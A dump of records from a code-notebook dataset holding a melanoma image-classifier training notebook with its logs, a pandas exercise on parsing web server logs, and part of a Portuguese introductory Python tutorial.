"lr_min = 1e-6\nlr_start = 0\nlr_max = config['LEARNING_RATE']\nstep_size = 26880 // config['BATCH_SIZE'] #(len(k_fold[k_fold[f'fold_{fold_n}'] == 'train']) * 2) // config['BATCH_SIZE']\ntotal_steps = config['EPOCHS'] * step_size\nhold_max_steps = 0\nwarmup_steps = step_size * 5\nnum_cycles = 5\n\nrng = [i for i in range(0, total_steps, config['BATCH_SIZE'])]\ny = [cosine_with_hard_restarts_schedule_with_warmup(tf.cast(x, tf.float32), total_steps=total_steps, \n warmup_steps=warmup_steps, lr_start=lr_start, \n lr_max=lr_max, lr_min=lr_min, num_cycles=num_cycles) for x in rng]\n\nsns.set(style=\"whitegrid\")\nfig, ax = plt.subplots(figsize=(20, 6))\nplt.plot(rng, y)\nprint(\"Learning rate schedule: {:.3g} to {:.3g} to {:.3g}\".format(y[0], max(y), y[-1]))",
"Learning rate schedule: 0 to 0.0003 to 1e-06\n"
]
],
[
[
"# Model",
"_____no_output_____"
]
],
[
[
"def model_fn(input_shape):\n input_image = L.Input(shape=input_shape, name='input_image')\n BaseModel, preprocess_input = Classifiers.get('resnet18')\n base_model = BaseModel(input_shape=input_shape, \n weights=config['BASE_MODEL_PATH'], \n include_top=False)\n\n x = base_model(input_image)\n x = L.GlobalAveragePooling2D()(x)\n output = L.Dense(1, activation='sigmoid')(x)\n \n model = Model(inputs=input_image, outputs=output)\n \n return model",
"_____no_output_____"
]
],
[
[
"# Training",
"_____no_output_____"
]
],
[
[
"eval_dataset = get_eval_dataset(TRAINING_FILENAMES, batch_size=config['BATCH_SIZE'], buffer_size=AUTO)\nimage_names = next(iter(eval_dataset.unbatch().map(lambda data, label, image_name: image_name).batch(len(k_fold)))).numpy().astype('U')\nimage_data = eval_dataset.map(lambda data, label, image_name: data)\n\nhistory_list = []\nkfold = KFold(config['N_FOLDS'], shuffle=True, random_state=SEED)\nfor n_fold, (trn_idx, val_idx) in enumerate(kfold.split(TRAINING_FILENAMES)):\n n_fold +=1\n print('\\nFOLD: %d' % (n_fold))\n# tf.tpu.experimental.initialize_tpu_system(tpu)\n K.clear_session()\n \n ### Data\n train_filenames = np.array(TRAINING_FILENAMES)[trn_idx]\n valid_filenames = np.array(TRAINING_FILENAMES)[val_idx]\n train_size = count_data_items(train_filenames)\n\n step_size = train_size // config['BATCH_SIZE']\n\n # Train model\n model_path = f'model_fold_{n_fold}.h5'\n \n es = EarlyStopping(monitor='val_loss', mode='min', patience=config['ES_PATIENCE'], \n restore_best_weights=True, verbose=1)\n checkpoint = ModelCheckpoint(model_path, monitor='val_loss', mode='min', \n save_best_only=True, save_weights_only=True)\n \n with strategy.scope():\n model = model_fn((config['HEIGHT'], config['WIDTH'], config['CHANNELS']))\n \n lr = lambda: cosine_with_hard_restarts_schedule_with_warmup(tf.cast(optimizer.iterations, tf.float32), \n total_steps=total_steps, warmup_steps=warmup_steps, \n lr_start=lr_start, lr_max=lr_max, lr_min=lr_min, \n num_cycles=num_cycles)\n \n optimizer = optimizers.Adam(learning_rate=lr)\n model.compile(optimizer, loss=losses.BinaryCrossentropy(label_smoothing=0.05), \n metrics=[metrics.AUC()])\n \n history = model.fit(get_training_dataset(train_filenames, batch_size=config['BATCH_SIZE'], buffer_size=AUTO),\n validation_data=get_validation_dataset(valid_filenames, ordered=True, repeated=False, \n batch_size=config['BATCH_SIZE'], buffer_size=AUTO),\n epochs=config['EPOCHS'], \n steps_per_epoch=step_size,\n callbacks=[checkpoint, es], \n verbose=2).history\n \n history_list.append(history)\n \n # Make predictions\n preds = model.predict(image_data)\n name_preds = dict(zip(image_names, preds.reshape(len(preds))))\n k_fold[f'pred_fold_{n_fold}'] = k_fold.apply(lambda x: name_preds[x['image_name']], axis=1)\n \n valid_filenames = np.array(TRAINING_FILENAMES)[val_idx]\n valid_dataset = get_eval_dataset(valid_filenames, batch_size=config['BATCH_SIZE'], buffer_size=AUTO)\n valid_image_names = next(iter(valid_dataset.unbatch().map(lambda data, label, image_name: image_name).batch(count_data_items(valid_filenames)))).numpy().astype('U')\n k_fold[f'fold_{n_fold}'] = k_fold.apply(lambda x: 'validation' if x['image_name'] in valid_image_names else 'train', axis=1)",
"\nFOLD: 1\nDownloading data from https://github.com/qubvel/classification_models/releases/download/0.0.1/resnet18_imagenet_1000_no_top.h5\n44924928/44920640 [==============================] - 2s 0us/step\nEpoch 1/20\n388/388 - 110s - loss: 0.3444 - auc: 0.5745 - val_loss: 0.3190 - val_auc: 0.4678\nEpoch 2/20\n388/388 - 110s - loss: 0.1709 - auc: 0.7907 - val_loss: 0.1716 - val_auc: 0.6173\nEpoch 3/20\n388/388 - 110s - loss: 0.1693 - auc: 0.8084 - val_loss: 0.1725 - val_auc: 0.7991\nEpoch 4/20\n388/388 - 109s - loss: 0.1676 - auc: 0.8360 - val_loss: 0.1761 - val_auc: 0.7353\nEpoch 5/20\n388/388 - 110s - loss: 0.1678 - auc: 0.8342 - val_loss: 0.1723 - val_auc: 0.8271\nEpoch 6/20\n388/388 - 109s - loss: 0.1678 - auc: 0.8349 - val_loss: 0.1719 - val_auc: 0.8505\nEpoch 7/20\n388/388 - 109s - loss: 0.1659 - auc: 0.8508 - val_loss: 0.1651 - val_auc: 0.8536\nEpoch 8/20\n388/388 - 109s - loss: 0.1619 - auc: 0.9023 - val_loss: 0.1629 - val_auc: 0.8788\nEpoch 9/20\n388/388 - 109s - loss: 0.1617 - auc: 0.8975 - val_loss: 0.1731 - val_auc: 0.7886\nEpoch 10/20\n388/388 - 108s - loss: 0.1657 - auc: 0.8637 - val_loss: 0.1641 - val_auc: 0.8696\nEpoch 11/20\n388/388 - 110s - loss: 0.1622 - auc: 0.8856 - val_loss: 0.1622 - val_auc: 0.8726\nEpoch 12/20\n388/388 - 109s - loss: 0.1584 - auc: 0.9298 - val_loss: 0.1703 - val_auc: 0.8444\nEpoch 13/20\n388/388 - 109s - loss: 0.1658 - auc: 0.8566 - val_loss: 0.1642 - val_auc: 0.8524\nEpoch 14/20\n388/388 - 110s - loss: 0.1625 - auc: 0.8843 - val_loss: 0.1638 - val_auc: 0.8741\nEpoch 15/20\n388/388 - 109s - loss: 0.1597 - auc: 0.9171 - val_loss: 0.1613 - val_auc: 0.8888\nEpoch 16/20\n388/388 - 108s - loss: 0.1631 - auc: 0.8702 - val_loss: 0.1672 - val_auc: 0.8218\nEpoch 17/20\n388/388 - 109s - loss: 0.1642 - auc: 0.8696 - val_loss: 0.1636 - val_auc: 0.8557\nEpoch 18/20\n388/388 - 110s - loss: 0.1577 - auc: 0.9135 - val_loss: 0.1623 - val_auc: 0.8898\nEpoch 19/20\n388/388 - 110s - loss: 0.1611 - auc: 0.8941 - val_loss: 0.1652 - val_auc: 0.8399\nEpoch 20/20\nRestoring model weights from the end of the best epoch.\n388/388 - 109s - loss: 0.1628 - auc: 0.8817 - val_loss: 0.1705 - val_auc: 0.6760\nEpoch 00020: early stopping\n\nFOLD: 2\nEpoch 1/20\n420/420 - 116s - loss: 0.5299 - auc: 0.5868 - val_loss: 0.2236 - val_auc: 0.4214\nEpoch 2/20\n420/420 - 116s - loss: 0.1708 - auc: 0.7867 - val_loss: 0.1733 - val_auc: 0.6629\nEpoch 3/20\n420/420 - 117s - loss: 0.1683 - auc: 0.8226 - val_loss: 0.1727 - val_auc: 0.7847\nEpoch 4/20\n420/420 - 116s - loss: 0.1681 - auc: 0.8297 - val_loss: 0.1718 - val_auc: 0.8458\nEpoch 5/20\n420/420 - 116s - loss: 0.1673 - auc: 0.8255 - val_loss: 0.1695 - val_auc: 0.8215\nEpoch 6/20\n420/420 - 116s - loss: 0.1670 - auc: 0.8507 - val_loss: 0.1700 - val_auc: 0.7645\nEpoch 7/20\n420/420 - 116s - loss: 0.1635 - auc: 0.8791 - val_loss: 0.1645 - val_auc: 0.8674\nEpoch 8/20\n420/420 - 116s - loss: 0.1594 - auc: 0.9177 - val_loss: 0.1625 - val_auc: 0.8850\nEpoch 9/20\n420/420 - 115s - loss: 0.1655 - auc: 0.8447 - val_loss: 0.1693 - val_auc: 0.7999\nEpoch 10/20\n420/420 - 115s - loss: 0.1627 - auc: 0.8884 - val_loss: 0.1658 - val_auc: 0.8688\nEpoch 11/20\n420/420 - 115s - loss: 0.1591 - auc: 0.9168 - val_loss: 0.1622 - val_auc: 0.8905\nEpoch 12/20\n420/420 - 115s - loss: 0.1646 - auc: 0.8718 - val_loss: 0.1707 - val_auc: 0.8474\nEpoch 13/20\n420/420 - 115s - loss: 0.1625 - auc: 0.8905 - val_loss: 0.1635 - val_auc: 0.8824\nEpoch 14/20\n420/420 - 115s - loss: 0.1570 - auc: 0.9257 - val_loss: 0.1616 - val_auc: 0.8943\nEpoch 15/20\n420/420 - 115s - loss: 0.1631 - auc: 0.8787 - val_loss: 0.1676 - val_auc: 0.8432\nEpoch 16/20\n420/420 - 115s - loss: 0.1626 - auc: 0.8970 - val_loss: 0.1642 - val_auc: 0.8632\nEpoch 17/20\n420/420 - 116s - loss: 0.1564 - auc: 0.9316 - val_loss: 0.1615 - val_auc: 0.9003\nEpoch 18/20\n420/420 - 116s - loss: 0.1630 - auc: 0.8833 - val_loss: 0.1666 - val_auc: 0.8375\nEpoch 19/20\n420/420 - 115s - loss: 0.1605 - auc: 0.8992 - val_loss: 0.1638 - val_auc: 0.8813\nEpoch 20/20\n420/420 - 115s - loss: 0.1563 - auc: 0.9301 - val_loss: 0.1605 - val_auc: 0.9036\n\nFOLD: 3\nEpoch 1/20\n420/420 - 116s - loss: 0.3711 - auc: 0.6013 - val_loss: 0.3470 - val_auc: 0.3612\nEpoch 2/20\n420/420 - 116s - loss: 0.1696 - auc: 0.8117 - val_loss: 0.1774 - val_auc: 0.5866\nEpoch 3/20\n420/420 - 116s - loss: 0.1684 - auc: 0.8100 - val_loss: 0.1683 - val_auc: 0.8577\nEpoch 4/20\n420/420 - 115s - loss: 0.1680 - auc: 0.8224 - val_loss: 0.1738 - val_auc: 0.8358\nEpoch 5/20\n420/420 - 116s - loss: 0.1662 - auc: 0.8292 - val_loss: 0.1695 - val_auc: 0.8260\nEpoch 6/20\n420/420 - 115s - loss: 0.1666 - auc: 0.8406 - val_loss: 0.1684 - val_auc: 0.8442\nEpoch 7/20\n420/420 - 116s - loss: 0.1649 - auc: 0.8679 - val_loss: 0.1645 - val_auc: 0.8949\nEpoch 8/20\n420/420 - 115s - loss: 0.1596 - auc: 0.9078 - val_loss: 0.1625 - val_auc: 0.8940\nEpoch 9/20\n420/420 - 116s - loss: 0.1664 - auc: 0.8366 - val_loss: 0.1758 - val_auc: 0.8424\nEpoch 10/20\n420/420 - 115s - loss: 0.1633 - auc: 0.8811 - val_loss: 0.1647 - val_auc: 0.8759\nEpoch 11/20\n420/420 - 116s - loss: 0.1603 - auc: 0.9169 - val_loss: 0.1616 - val_auc: 0.8950\nEpoch 12/20\n420/420 - 115s - loss: 0.1651 - auc: 0.8374 - val_loss: 0.1774 - val_auc: 0.8308\nEpoch 13/20\n420/420 - 115s - loss: 0.1619 - auc: 0.8947 - val_loss: 0.1663 - val_auc: 0.8679\nEpoch 14/20\n420/420 - 115s - loss: 0.1601 - auc: 0.9131 - val_loss: 0.1629 - val_auc: 0.8866\nEpoch 15/20\n420/420 - 115s - loss: 0.1634 - auc: 0.8658 - val_loss: 0.1701 - val_auc: 0.7866\nEpoch 16/20\nRestoring model weights from the end of the best epoch.\n420/420 - 115s - loss: 0.1635 - auc: 0.8814 - val_loss: 0.1628 - val_auc: 0.8912\nEpoch 00016: early stopping\n\nFOLD: 4\nEpoch 1/20\n420/420 - 116s - loss: 0.4498 - auc: 0.5856 - val_loss: 0.3107 - val_auc: 0.5576\nEpoch 2/20\n420/420 - 116s - loss: 0.1690 - auc: 0.8076 - val_loss: 0.1769 - val_auc: 0.5459\nEpoch 3/20\n420/420 - 115s - loss: 0.1694 - auc: 0.8104 - val_loss: 0.1708 - val_auc: 0.7719\nEpoch 4/20\n420/420 - 115s - loss: 0.1682 - auc: 0.8245 - val_loss: 0.1726 - val_auc: 0.8335\nEpoch 5/20\n420/420 - 115s - loss: 0.1666 - auc: 0.8292 - val_loss: 0.1743 - val_auc: 0.7735\nEpoch 6/20\n420/420 - 115s - loss: 0.1666 - auc: 0.8330 - val_loss: 0.1670 - val_auc: 0.8400\nEpoch 7/20\n420/420 - 115s - loss: 0.1629 - auc: 0.8741 - val_loss: 0.1679 - val_auc: 0.8536\nEpoch 8/20\n420/420 - 115s - loss: 0.1593 - auc: 0.9154 - val_loss: 0.1641 - val_auc: 0.8801\nEpoch 9/20\n420/420 - 115s - loss: 0.1652 - auc: 0.8473 - val_loss: 0.1692 - val_auc: 0.8480\nEpoch 10/20\n420/420 - 114s - loss: 0.1636 - auc: 0.8740 - val_loss: 0.1665 - val_auc: 0.8579\nEpoch 11/20\n420/420 - 115s - loss: 0.1581 - auc: 0.9172 - val_loss: 0.1640 - val_auc: 0.8884\nEpoch 12/20\n420/420 - 115s - loss: 0.1650 - auc: 0.8634 - val_loss: 0.1695 - val_auc: 0.8133\nEpoch 13/20\n420/420 - 115s - loss: 0.1628 - auc: 0.8866 - val_loss: 0.1674 - val_auc: 0.8332\nEpoch 14/20\n420/420 - 115s - loss: 0.1583 - auc: 0.9123 - val_loss: 0.1646 - val_auc: 0.8600\nEpoch 15/20\n420/420 - 115s - loss: 0.1656 - auc: 0.8635 - val_loss: 0.1747 - val_auc: 0.8113\nEpoch 16/20\nRestoring model weights from the end of the best epoch.\n420/420 - 115s - loss: 0.1613 - auc: 0.8895 - val_loss: 0.1654 - val_auc: 0.8778\nEpoch 00016: early stopping\n\nFOLD: 5\nEpoch 1/20\n420/420 - 115s - loss: 0.2389 - auc: 0.6066 - val_loss: 0.2482 - val_auc: 0.4157\nEpoch 2/20\n420/420 - 115s - loss: 0.1703 - auc: 0.7821 - val_loss: 0.1790 - val_auc: 0.6004\nEpoch 3/20\n420/420 - 116s - loss: 0.1693 - auc: 0.8237 - val_loss: 0.1690 - val_auc: 0.8112\nEpoch 4/20\n420/420 - 115s - loss: 0.1688 - auc: 0.8130 - val_loss: 0.1662 - val_auc: 0.8398\nEpoch 5/20\n420/420 - 116s - loss: 0.1674 - auc: 0.8336 - val_loss: 0.1714 - val_auc: 0.7537\nEpoch 6/20\n420/420 - 117s - loss: 0.1663 - auc: 0.8521 - val_loss: 0.1638 - val_auc: 0.8589\nEpoch 7/20\n420/420 - 116s - loss: 0.1639 - auc: 0.8717 - val_loss: 0.1637 - val_auc: 0.8728\nEpoch 8/20\n420/420 - 116s - loss: 0.1608 - auc: 0.9067 - val_loss: 0.1607 - val_auc: 0.9037\nEpoch 9/20\n420/420 - 115s - loss: 0.1664 - auc: 0.8376 - val_loss: 0.1839 - val_auc: 0.8883\nEpoch 10/20\n420/420 - 116s - loss: 0.1646 - auc: 0.8744 - val_loss: 0.1609 - val_auc: 0.9090\nEpoch 11/20\n420/420 - 115s - loss: 0.1591 - auc: 0.9130 - val_loss: 0.1608 - val_auc: 0.9066\nEpoch 12/20\n420/420 - 115s - loss: 0.1666 - auc: 0.8533 - val_loss: 0.1643 - val_auc: 0.8714\nEpoch 13/20\nRestoring model weights from the end of the best epoch.\n420/420 - 115s - loss: 0.1634 - auc: 0.8730 - val_loss: 0.1620 - val_auc: 0.8997\nEpoch 00013: early stopping\n"
]
],
[
[
"## Model loss graph",
"_____no_output_____"
]
],
[
[
"for n_fold in range(config['N_FOLDS']):\n print(f'Fold: {n_fold + 1}')\n plot_metrics(history_list[n_fold])",
"Fold: 1\n"
]
],
[
[
"## Model loss graph aggregated",
"_____no_output_____"
]
],
[
[
"plot_metrics_agg(history_list, config['N_FOLDS'])",
"_____no_output_____"
]
],
[
[
"# Model evaluation",
"_____no_output_____"
]
],
[
[
"display(evaluate_model(k_fold, config['N_FOLDS']).style.applymap(color_map))",
"_____no_output_____"
]
],
[
[
"# Model evaluation by Subset",
"_____no_output_____"
]
],
[
[
"display(evaluate_model_Subset(k_fold, config['N_FOLDS']).style.applymap(color_map))",
"_____no_output_____"
]
],
[
[
"# Confusion matrix",
"_____no_output_____"
]
],
[
[
"for n_fold in range(config['N_FOLDS']):\n n_fold += 1\n pred_col = f'pred_fold_{n_fold}' \n train_set = k_fold[k_fold[f'fold_{n_fold}'] == 'train']\n valid_set = k_fold[k_fold[f'fold_{n_fold}'] == 'validation'] \n print(f'Fold: {n_fold}')\n plot_confusion_matrix(train_set['target'], np.round(train_set[pred_col]),\n valid_set['target'], np.round(valid_set[pred_col]))",
"Fold: 1\n"
]
],
[
[
"# Visualize predictions",
"_____no_output_____"
]
],
[
[
"k_fold['pred'] = 0\nfor n_fold in range(config['N_FOLDS']):\n k_fold['pred'] += k_fold[f'pred_fold_{n_fold+1}'] / config['N_FOLDS']\n \nprint('Top 10 samples')\ndisplay(k_fold[['image_name', 'sex', 'age_approx','anatom_site_general_challenge', 'diagnosis',\n 'target', 'pred'] + [c for c in k_fold.columns if (c.startswith('pred_fold'))]].head(10))\n\nprint('Top 10 positive samples')\ndisplay(k_fold[['image_name', 'sex', 'age_approx','anatom_site_general_challenge', 'diagnosis',\n 'target', 'pred'] + [c for c in k_fold.columns if (c.startswith('pred_fold'))]].query('target == 1').head(10))\n\n\nprint('Top 10 predicted positive samples')\ndisplay(k_fold[['image_name', 'sex', 'age_approx','anatom_site_general_challenge', 'diagnosis',\n 'target', 'pred'] + [c for c in k_fold.columns if (c.startswith('pred_fold'))]].query('pred > .5').head(10))\n\nprint('Label/prediction distribution')\nprint(f\"Train positive labels: {len(k_fold[k_fold['target'] > .5])}\")\nprint(f\"Train positive predictions: {len(k_fold[k_fold['pred'] > .5])}\")\nprint(f\"Train positive correct predictions: {len(k_fold[(k_fold['target'] > .5) & (k_fold['pred'] > .5)])}\")",
"Top 10 samples\n"
]
],
[
[
"# Make predictions",
"_____no_output_____"
]
],
[
[
"model_path_list = glob.glob('/kaggle/working/' + '*.h5')\nn_models = len(model_path_list)\nmodel_path_list.sort()\n\nprint(f'{n_models} Models to predict:')\nprint(*model_path_list, sep='\\n')",
"5 Models to predict:\n/kaggle/working/model_fold_1.h5\n/kaggle/working/model_fold_2.h5\n/kaggle/working/model_fold_3.h5\n/kaggle/working/model_fold_4.h5\n/kaggle/working/model_fold_5.h5\n"
],
[
"test_dataset = get_test_dataset(TEST_FILENAMES, batch_size=config['BATCH_SIZE'], buffer_size=AUTO)\nNUM_TEST_IMAGES = len(test)\ntest_preds = np.zeros((NUM_TEST_IMAGES, 1))\n\n\nfor model_path in model_path_list:\n# tf.tpu.experimental.initialize_tpu_system(tpu)\n K.clear_session()\n print(model_path)\n model = model_fn((config['HEIGHT'], config['WIDTH'], config['CHANNELS']))\n model.load_weights(model_path)\n \n test_preds += model.predict(test_dataset) / n_models\n\n\nimage_names = next(iter(test_dataset.unbatch().map(lambda data, image_name: image_name).batch(NUM_TEST_IMAGES))).numpy().astype('U')\nname_preds = dict(zip(image_names, test_preds.reshape(len(test_preds))))\ntest['target'] = test.apply(lambda x: name_preds[x['image_name']], axis=1)",
"/kaggle/working/model_fold_1.h5\n/kaggle/working/model_fold_2.h5\n/kaggle/working/model_fold_3.h5\n/kaggle/working/model_fold_4.h5\n/kaggle/working/model_fold_5.h5\n"
]
],
[
[
"# Visualize test predictions",
"_____no_output_____"
]
],
[
[
"print(f\"Test predictions {len(test[test['target'] > .5])}|{len(test[test['target'] <= .5])}\")\nprint('Top 10 samples')\ndisplay(test[['image_name', 'sex', 'age_approx','anatom_site_general_challenge','target'] + \n [c for c in test.columns if (c.startswith('pred_fold'))]].head(10))\n\nprint('Top 10 positive samples')\ndisplay(test[['image_name', 'sex', 'age_approx','anatom_site_general_challenge', 'target'] + \n [c for c in test.columns if (c.startswith('pred_fold'))]].query('target > .5').head(10))",
"Test predictions 12|10970\nTop 10 samples\n"
]
],
[
[
"# Test set predictions",
"_____no_output_____"
]
],
[
[
"submission = pd.read_csv(database_base_path + 'sample_submission.csv')\nsubmission['target'] = test['target']\nsubmission.to_csv('submission.csv', index=False)\ndisplay(submission.head(10))\ndisplay(submission.describe())",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb050f96db04be67f07aea806e3206e5ab6899bd | 7,666 | ipynb | Jupyter Notebook | 19-workout-blank_combining_datasets_concat_append.ipynb | hanisaf/advanced-data-management-and-analytics | e7bffda5cad91374a14df1a65f95e6a25f72cc41 | [
"MIT"
] | 6 | 2020-04-13T19:22:18.000Z | 2021-04-20T18:20:13.000Z | 19-workout-blank_combining_datasets_concat_append.ipynb | hanisaf/advanced-data-management-and-analytics | e7bffda5cad91374a14df1a65f95e6a25f72cc41 | [
"MIT"
] | null | null | null | 19-workout-blank_combining_datasets_concat_append.ipynb | hanisaf/advanced-data-management-and-analytics | e7bffda5cad91374a14df1a65f95e6a25f72cc41 | [
"MIT"
] | 10 | 2020-05-12T01:02:32.000Z | 2022-02-28T17:04:37.000Z | 28.392593 | 333 | 0.445995 | [
[
[
"import pandas as pd\nimport numpy as np",
"_____no_output_____"
]
],
[
[
"This exercise uses data from: \n Zaker, Farzin, 2019, \"Online Shopping Store - Web Server Logs\", https://doi.org/10.7910/DVN/3QBYB5, Harvard Dataverse, V1 \n \nThe files `server_log_00.txt` `server_log_01.txt` `server_log_02.txt` `server_log_03.txt` `server_log_04.txt` `server_log_05.txt` `server_log_06.txt` `server_log_07.txt` `server_log_08.txt` `server_log_09.txt` contain logs of an online shopping store web server\n\nEach file contains 100 lines for a total of 1000 transaction logs\n\n# Part 1\n\nLet us focus on one file, the code below reads the first file",
"_____no_output_____"
]
],
[
[
"df_00 = pd.read_csv('data/server_log_00.txt', sep='\\n', header=None)\ndf_00.head()",
"_____no_output_____"
]
],
[
[
"Each row is one big string containing the server log. The [log contains multiple fields](https://docs.nginx.com/nginx/admin-guide/monitoring/logging/)\nIn this exercise we are interested in the IP address (the first field) and the timestamp. For example, the first row",
"_____no_output_____"
]
],
[
[
"df_00.iloc[0, 0]",
"_____no_output_____"
]
],
[
[
"is a request coming from `54.36.149.41` on `22/Jan/2019:03:56:14 +0330`. \n\n1. Extract the IP and timestamp in two separate columns. Discard the original column `0`.",
"_____no_output_____"
],
[
"The data frame should look like",
"_____no_output_____"
]
],
[
[
"df_00.head()",
"_____no_output_____"
]
],
[
[
"# Part 2\n2. Repeat the same operations for all of the files. In total you should have ten data frames\n3. Combine the ten data frames in one master data frame",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb0517a47510743acc621ee8e7a76e9a61214cef | 95,209 | ipynb | Jupyter Notebook | Projeto 1/Fundamentos_de_Python_para_Data_Science.ipynb | josecavalcante720/Python-Para-Ciencia-de-Dados | aae3637b8cdf5a797061903422b1f128540777a6 | [
"MIT"
] | null | null | null | Projeto 1/Fundamentos_de_Python_para_Data_Science.ipynb | josecavalcante720/Python-Para-Ciencia-de-Dados | aae3637b8cdf5a797061903422b1f128540777a6 | [
"MIT"
] | null | null | null | Projeto 1/Fundamentos_de_Python_para_Data_Science.ipynb | josecavalcante720/Python-Para-Ciencia-de-Dados | aae3637b8cdf5a797061903422b1f128540777a6 | [
"MIT"
] | null | null | null | 30.712581 | 12,503 | 0.48508 | [
[
[
"<a href=\"https://colab.research.google.com/github/ricardorocha86/Fundamentos-de-Python-para-ML/blob/main/Fundamentos_de_Python_para_Data_Science.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"# **Fundamentos de Python para Data Science**\n",
"_____no_output_____"
],
[
" ",
"_____no_output_____"
],
[
"\nEssa é uma introdução bem rápida aos conceitos fundamentais de programação em Python. Se familiarizar com tais conceitos é um primeiro passo suficiente para fazer seus primeiros programas e também entender outros códigos feitos em Python. No entanto, não se engane, o universe de Python é gigante e existe muita coisa interessante para se conhecer ainda!\n\nApós terminar essa introdução, não deixe de se desafiar nos exercícios propostos! São importantíssimos para criar manejo e intimidade com a linguagem. ",
"_____no_output_____"
],
[
"## **Conteúdo desse notebook:**\n\n1. [Atribuição de Variáveis](#atri)\n2. [Primeiras Funções](#prim)\n3. [Operadores Aritméticos](#oper)\n4. [Comparações e Booleanos](#comp)\n5. [Condicional IF-ELSE](#cond)\n6. [Definição de Funções](#defi) \n6. [Importação de Bibliotecas](#impo) \n6. [A Biblioteca Numpy](#nump) \n\n6. [Listas](#lists) \n6. [Métodos de Listas](#metl) Iteradores FOR e WHILE\n6. [Métodos de Strings](#mets) \n6. [Funções Importantes](#func) \n6. [Iteradores FOR e WHILE](#iter) \n6. [Projeto: Álbum de Figurinhas](#proj) \n\n7. [Exercícios](#exer) \n9. [Links Úteis](#links)\n10. [Anexo: Zen of Python](#anex)",
"_____no_output_____"
],
[
"## **Atribuição de Variáveis** <a name=\"atri\"></a>",
"_____no_output_____"
]
],
[
[
"meu_nome = 'Ricardo'\nmeu_sobrenome = 'Rocha'\nmeu_produto = \"Caixa d'agua\"\nminha_frase = '\"Vamos que vamos!\"'\n\nprint(meu_nome)\nprint(meu_sobrenome)\nprint(meu_produto)\nprint(minha_frase)",
"Ricardo\nRocha\nCaixa d'agua\n\"Vamos que vamos!\"\n"
]
],
[
[
"Não é possível atribuir variáveis com nomes começando com números, nem com espaços no nome ou com aspas. ",
"_____no_output_____"
],
[
"OBS.: O **hashtag #** na frente de uma linha torna ela um **comentário**, pois o interpretador ignora tudo que vem depois dela ",
"_____no_output_____"
],
[
"## **Primeiras Funções** <a name=\"prim\"></a>",
"_____no_output_____"
],
[
"Conheça a função **len**, que retorna o tamanho de uma string (e de outros tipos de objetos também).\n\nA função **type**, que retorna o tipo do objeto na variável de entrada\n\nA função **round**, que arredonda um número de acordo com as casas decimas desejadas\n\nE a função **help**, que retorna a documentação da função inserida como entrada.",
"_____no_output_____"
]
],
[
[
"nome = 'Ricardo'\nlen(nome)",
"_____no_output_____"
]
],
[
[
"Não só no Python, mas em programação em geral, sempre precisamos controlar o tipo das variáveis que utilizamos. Veja o exemplo abaixo:",
"_____no_output_____"
]
],
[
[
"minha_idade = '33'\ntype(minha_idade)\n",
"_____no_output_____"
]
],
[
[
"Usando a função **int** para converter a variável em formato string para o formato inteiro",
"_____no_output_____"
]
],
[
[
"\nminha_idade = int(minha_idade)\ntype(minha_idade)",
"_____no_output_____"
]
],
[
[
"## **Operadores Aritméticos** <a name=\"oper\"></a>",
"_____no_output_____"
],
[
"Confira na tabela abaixo como funcionam os operadores aritméticos em Python. \n\nEm especial, veja que a sintaxe da exponenciação não é feita através do sinal '^'.",
"_____no_output_____"
],
[
"| Operator | Name | Description |\n|--------------|----------------|--------------------------------------------------------|\n| ``a + b`` | Adiçao | Soma entre ``a`` e ``b`` |\n| ``a - b`` | Subtração | Diferença entre ``a`` e ``b`` |\n| ``a * b`` | Multiplicação | Produto entre ``a`` e ``b`` |\n| ``a / b`` | Divisão | Divisão usual entre ``a`` e ``b`` |\n| ``a // b`` | Divisão inteira | A divisão entre ``a`` e ``b``, removendo as partes decimais |\n| ``a % b`` | Resto da divisão | O resto da divisão inteira de ``a`` por ``b`` |\n| ``a ** b`` | Exponenciação | ``a`` elevado a ``b`` |\n| ``-a`` | Negação | O negativo de ``a`` |",
"_____no_output_____"
]
],
[
[
"print(a + b)\nprint(a - b)\nprint(a * b)\nprint(a / b)\nprint(a // b)\nprint(a % b)\nprint(a ** b)\nprint(-a)",
"_____no_output_____"
],
[
"print(max(a, b))\nprint(min(a, b))\nprint(abs(-a))",
"1.0\n1\n-2\n1\n"
]
],
[
[
"## **Comparações e Booleanos** <a name=\"comp\"></a>",
"_____no_output_____"
],
[
"Quando comparamos objetos em Python é como se estivéssemos fazendo uma pergunta a ele. Duas variáveis são iguais? Uma é maior que a outra? \n\nE a resposta é um objeto do tipo **booleano**, que é indicado por **True** ou **False**, indicando, respectivamente, se a resposta é verdadeira ou falsa.",
"_____no_output_____"
]
],
[
[
"var1 = 35\nvar2 = 36\n\nvar1 == var2",
"_____no_output_____"
],
[
"print(type(33.2) == str)\nprint(type(33.2) == int)\nprint(type(33.2) == float)",
"False\nFalse\nTrue\n"
],
[
"True and True\nTrue or False\nnot False",
"_____no_output_____"
]
],
[
[
"## **Condicional IF-ELSE** <a name=\"cond\"></a>",
"_____no_output_____"
],
[
